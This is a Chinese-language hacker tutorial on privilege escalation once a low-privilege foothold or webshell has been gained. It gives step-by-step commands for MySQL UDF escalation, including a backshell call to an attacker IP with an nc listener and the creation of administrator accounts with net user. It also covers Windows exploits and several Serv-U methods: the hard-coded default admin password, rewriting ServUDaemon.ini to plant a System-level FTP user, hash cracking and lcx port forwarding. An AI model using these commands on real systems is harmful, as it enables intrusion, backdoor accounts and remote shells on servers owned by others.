提权思路

0x01 mysql提权

0x01 UDF提权

1、利用UDF提权
udf提权这是最常见的提权方式,也就是User defined Function,用户定义函数。是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。

适用场合:
1、目标主机系统是Windows(Win2000、XP、Win2003)。
2、拥有该主机mysql中的某个用户账号,该账号需要有对mysql的insert和delete权限。

使用方法:
1、获取当前mysql的一个账号,一般情况下在网站的config.php文件就能找到(具体在哪个文件每个CMS都不一样)。
2、把udf专用的webshell传到服务器上,访问并进行数据库连接。
3、连接成功后,导出DLL文件。mysql<5.0,导出路径随意;5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“no paths="" allowed="" for="" shared="" library”错误;mysql="">5.1,需要使用

1
show variables like '%plugin%';

语句查看插件安装路径,导出的时候指定DLL路径为插件路径。
回显如下:

1
2
3
4
5
6
mysql> show variables like '%plugin%';
+---------------+------------------------------------------+
| Variable_name | Value |
+---------------+------------------------------------------+
| plugin_dir | E:\wamp\bin\mysql\mysql5.5.20\lib/plugin |
+---------------+------------------------------------------+

4、使用SQL语句创建自定义函数。语法如下:

1
2
Create Function 函数名 returns string soname '导出的DLL路径';
// eg:Create Function cmdshell returns string soname 'udf.dll';

常用函数名:

cmdshell    执行cmd;
downloader  下载者,到网上下载指定文件并保存到指定目录;
open3389    通用开3389终端服务,可指定端口(不改端口无需重启);
backshell   反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread     读注册表;
regwrite    写注册表;
shut        关机,注销,重启;
about       说明与帮助函数;

若mysql>=5.0,语句中的DLL不允许带全路径,如果在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则将会看到”Can’t open shared library“错误。
如果提示“Function ‘cmdshell’ already exists”,则输入下列语句可以解决:

1
delete from mysql.func where name='cmdshell'

5、创建函数成功后,就可以通过sql语句去调用它了。语法如下:

1
2
select 创建的函数名 ('参数列表');
// eg:select cmdshell("net user hacker 12345 /add"); 创建一个用户hacker,密码为12345

6、函数使用完后,我们需要把之前生成的DLL和创建的函数删除掉,但要注意次序,必须先删除函数再删除DLL。删除函数的语法如下:

1
2
drop function 创建的函数名;
// eg:drop function cmdshell;

具体流程如下:

1
2
3
4
5
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user waitalone waitalone.cn /add');
select cmdshell('net localgroup administrators waitalone /add');
drop function cmdshell; 删除函数
delete from mysql.func where name='cmdshell' 删除函数

注意:
1、导出的文件名不一定非是xxx.dll,可以是任意的。

1
create function sys_eval returns string soname 'udf.xox';

2、提示错误 Can’t open shared library ‘fun.dll’ (errno: 2 )
除了udf不存在、udf被杀,还有可能是你的udf版本不对,你拿32位的udf去在64位系统注册的话,一样会提示错误。
3、某些情况下,我们会遇到Can’t open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默认情况下plugin不存在,可以利用NTFS ADS流来创建文件夹的方法

1
2
3
select @@basedir; //查找到mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS创建plugin目录

4、降权的mysql一样有用,能注册dll的话你一样能够执行命令,不过权限是根据mysql来的, 在不支持aspx,ws、shell.application被删得情况下还有一丝希望。

0x02 反弹端口连接提权

假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?
1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。

1
2
3
4
mysql.exe -h 172.16.10.11 -uroot -p
Enter password:
mysql> \. c:\mysql.txt
mysql>select backshell("YourIP",2010);

2、本地监听你反弹的端口
nc.exe -vv -l -p 2010
成功后,将获得一个system权限的cmdshell,其实这个也是利用的UDF提权。

0x02 Windows提权

操作系统漏洞提权
systeminfo
查看修补的补丁编号
PR -pr.exe
巴西烤肉
IIS6溢出 -iis6.exe
LPK劫持 -lpk.dll

当我们拿到一个低权限的webshell后,一般先探测服务器内部的信息,以找见可以提权的条件和桥梁。什么叫服务器的总体环境呢?例如:目标服务器开启的端口、进程、系统服务,安装了哪些程序,系统安全的大体设置。

为什么要获取服务器的这些总体信息呢?
1、端口信息,可以让我们知道服务器开了哪些端口?哪些端口可以利用?哪些端口对应的服务或程序可以利用?或是对方还开了哪些我们不知道的服务(比如对方又开了一些不常用的端口来运行高权限的WEB服务,如tomcat等)。
比如,SERV-U修改了本地管理端口,我们也可以通过端口和进程信息进行了解。
2、进程信息,可以让我们知道服务器运行了哪些程序,管理员喜欢开什么程序,或正在运行什么程序。有哪些防护(比如杀毒软件,防火墙等信息)
3、系统服务信息,可以让我们了解,哪些服务是运行的,哪些服务可以利用。第三方服务的路径以及启动方式等信息。
如果第三方服务,是装在某些特殊目录,我们可以通过查询系统服务信息获得后,用CACLS命令查询其是否有权限进行修改或写入等操作。若可以写入,或修改,我们就可以替换或修改服务程序来达到提权的目的。
4、系统环境变量,也可以让我们获得一些信息,比如安装了哪些程序,哪些变量我们可以利用。
5、系统权限的设置的探测,我们可以通过一些疏漏的地方进行利用,以达到提权的目的。

通过常规web渗透,已经拿到webshell。那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接。
Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行探测的。

Windows常见提权思路:(前提已经getshell但是权限不大的前提下)
1、查看基本的信息

2、使用cmd执行命令
尝试使用cmd执行命令

找可写目录

尝试上传cmd.exe

写一个ASPX马

继续上传cmd.exe,并执行cmd命令

3、提升权限
查看未安装补丁

上传exp(iss6.exe)提权


4、添加用户
添加远程连接用户

1
2
net user hacker 123 /add
net localgroup administrators hacker /add

0x03 Server-U提权

Serv-U提权,属于一种漏洞,该漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令。
漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Serv-u>3.x版本默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理。

serv-u提权主要分为serv-u6及以前版本、serv-u7以下版本的提权,serv-u7版本提权等

主要提权方法:

一、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下 比如是d盘
3、执行命令 d:\serv_u.exe
4、d:\serv_u.exe “net user username password /add” (注意命令要有引号)
5、d:\serv_u.exe “net localgroup administrators username /add” (注意命令要有引号)

二、ServUDaemon.ini 文件重写后提权(对ServUDaemon.ini有写入的权限)

先修改Domain来添加用户

1
2
[Domain1]
User2=spider|1|0

然后在ServUDaemon.ini文件尾部追下如下代码来添加用户的详细信息:

1
2
3
4
5
6
7
8
9
10
[USER=spiger|1]
Password=sbd8b58b5c201ee5cc20f9a8551197d4a5
HomeDir=c:\
RelPaths=3
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=d:\|RWAMELCDP
Access3=e:\|RWAMELCDP
SKEYValues=

添加上述代码并保存后,就会在serv-u中添加用户名为spiger,密码是123456。
通过在本地命令行执行ftp 目标IP地址 命令来连接目标FTP服务器。连接后

1
2
quote site exec net user spiger 123456 /add
quote site exec net localgroup administrators spiger /add

ps:上述添加的文件中最重要的是Maintenance=System这句,有了这句添加的FTP用户才是管理员用户,才会有命令执行权限(因为最后是通过FTFP执行命令来添加系统用户的)。

三、serv-u配置文件无修改权限,但是可以看到配置文件,进行口令破解

看到FTP用户的配置文件ServUDaemon.ini,在其中找到Maintenance=System的用户,该用户就是系统管理员。如果能够成功破解系统管理员的口令,就可以利用该管理员执行添加系统管理员的用户(类似方法二)。
serv-u配置文件中Password字段就是用户口令加密变换后的字符串,破解方法:去掉前两位,剩下的进行md5破解,破解后再去掉前两位,剩下的就是FTP用户口令。

四、serv-u配置文件无修改权限,可以用Serv-u管理用户来进行提权(这是最常用的方法,一般大马中集成的serv-u提权方法就是本方法)

serv-u的默认管理端口是43958,只有本地才能进行连接这个管理端口。serv-u默认管理账号是LocalAdministrator,默认密码是”#l@$ak#.lk;0@P“,这个密码是固定的。如果网站管理员忘记修改密码,那么获取webshell后就可以连接该端口后执行命令来添加系统用户。

虽然,网站管理员很少修改serv-u的这个默认管理账号和口令,但是如果管理员修改了,我们还可以通过查看ServUAdmin.exe文件来获取管理账号和口令。方法如下:下载serv-u目录下的ServUAdmin.exe文件,在本地用文本文件打开,查找LocalAdministrator字符来获取口令位置:

可以看到serv-u的管理账号和口令都在文件中,仔细查找即可(如果连用户名也修改了,就搜127.0.0.1或记住账号和密码在文件中的位置)。获取管理账号和口令后就可以利用大马自带的serv-u来进行提权了。

五、serv-u ftp转发端口
我们可以利用端口转发的方式来将其管理端口转发的本地,进而提权。在目标Webshell上运行LCX:

1
lcx -slave 你的IP 5000 127.0.0.1 43958

在本机上运行:

1
lcx -listen 5000 21

打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator 密码#l@$ak#.lk;0@P此时的连接过程是:本机连接21端口——>转发往本机5000端口——>管道连接至远程机5000端口——>转发至远程43958端口
连接成功后,在本机登陆Serv_U就相当于登陆了远程的Serv_U。你可以FTP登陆本机IP,输入上面的帐号和密码,在远程FTP服务器上执行命令。